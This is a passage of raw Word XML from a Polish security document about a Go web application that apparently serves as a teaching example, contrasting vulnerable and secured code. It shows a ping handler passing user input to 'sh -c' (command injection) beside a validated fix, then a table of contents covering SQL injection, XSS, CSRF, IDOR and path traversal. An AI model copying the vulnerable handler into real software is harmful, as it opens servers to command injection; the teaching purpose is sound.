        <w:t xml:space="preserve"> są interpretowane przez powłokę. Secure najpierw waliduje host regexem dopuszczającym tylko litery, cyfry, kropkę i myślnik, a później wywołuje </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>exec.CommandContext</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bez powłoki, przekazując host jako pojedynczy argument procesu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kod podatny: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PingVulnerable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host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"host"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host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==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JSON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StatusBadRequest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rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"error"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>: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"host parameter required"</w:t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64748B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>// VULNERABLE: shell metacharacters execute as part of sh -c.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cmd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exec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Command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"sh"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"-c"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"ping -c1 "</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="BE185D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>host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out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_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cmd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CombinedOutput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http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StatusOK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out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13" w:name="lst13"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 13. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2013"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kod zabezpieczony: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var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validHostRE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regexp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MustCompile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"^[a-zA-Z0-9.\\-]+$"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runSecurePing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ctx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host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validatePingHost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host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;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!=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pingCtx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cancel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WithTimeout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ctx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securePingTimeout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defer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cancel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out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:=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exec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CommandContext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pingCtx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"ping"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91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"-c1"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host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CombinedOutput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if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pingCtx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==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DeadlineExceeded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out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fmt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Errorf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91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"ping timed out after %s"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securePingTimeout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color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>_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=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ab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:color w:val="7C3AED"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>return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out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nil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>}</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2014" w:name="lst14"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 14. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2014"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="10" w:name="sec10"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>Spis treści</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:hyperlink w:anchor="sec1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">1. Pliki celowo pominięte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2">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">2. Porównanie kodu podatnego i zabezpieczonego </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>......................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec2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">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">2.1. SQL Injection w wyszukiwarce biblioteki </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>........................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec3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">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">2.2. Stored XSS w komentarzach pod postami </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..........................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec4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">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">2.3. Broken Authentication i zapis haseł </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>............................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec5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">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">2.4. CSRF w ustawieniach profilu </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>....................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec6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">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">2.5. Broken Access Control / IDOR w moderacji postów </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec7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8">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">2.6. Path Traversal / LFI w podglądzie plików fanartów </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..............</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec8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9">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">2.7. Command Injection w narzędziu sprawdzania hosta streamu </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>........</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec9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11">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">3. Spis pakietów </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>....................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec11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12">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">4. internal/config </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec12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3">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">4.1. Typy </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...........................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec13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4">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">4.2. AppConfig </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>......................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec14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5">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">4.3. Funkcje i metody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sec15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6">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">4.4. Load </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...........................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec16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17">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">5. internal/db </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>......................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec17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8">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">5.1. Stałe i zmienne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sec18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9">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">5.2. fallbackAdminEmail </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.............................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec19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0">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">5.3. fallbackAdminPassword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sec20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1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">5.4. fallbackAdminUsername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sec21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2">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">5.5. seedEventAttributeRE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sec22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3">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">5.6. seedJavascriptSchemeRE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sec23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4">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">5.7. seedScriptTagRE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sec24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5">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">5.8. Funkcje i metody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sec25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6">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">5.9. seededAdminCredentials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sec26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7">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">5.10. InitDB </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>........................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec27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8">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">5.11. MigrateDB </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.....................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec28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9">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">5.12. columnExists </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec29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0">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">5.13. SeedDB </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>........................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec30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1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">5.14. encodePasswordForSeed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sec31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2">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">5.15. upsertSeedUser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sec32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3">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">5.16. encodeCommentForSeed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sec33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34">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6. internal/handlers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sec34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5">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.1. Typy </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...........................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec35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6">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.2. Handler </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>........................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec36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7">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.3. Stałe i zmienne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sec37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8">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.4. authCookieName </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec38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39">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.5. csrfCookieName </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec39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0">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.6. fallbackSessionSecret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sec40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1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.7. maxUploadBytes </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec41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2">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.8. securePingTimeout </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..............................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec42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3">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.9. sessionSecretEnv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sec43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4">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.10. uploadsDir </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>....................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec44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5">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.11. uploadsURLPath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sec45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6">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.12. validHostRE </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec46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7">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.13. Funkcje i metody </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..............................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec47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8">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.14. New </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...........................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec48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49">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.15. *Handler.securityEnabled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sec49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0">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.16. *Handler.SetSecurityEnabled </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec50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1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.17. renderHTML </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>....................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec51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2">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.18. signCookieValue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sec52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3">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.19. sessionSecret </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec53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4">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.20. verifyCookieValue </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.............................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec54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5">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.21. *Handler.setAuthCookie </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>........................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec55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6">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
